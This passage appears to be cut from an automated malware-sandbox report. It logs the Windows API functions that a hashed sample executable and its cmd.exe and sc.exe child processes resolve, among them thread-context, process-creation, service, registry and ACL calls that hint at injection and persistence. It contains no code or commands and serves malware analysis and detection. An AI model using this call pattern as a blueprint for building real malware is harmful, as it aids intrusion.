(UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004580)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005596)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005596)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00004648)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00004648)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter 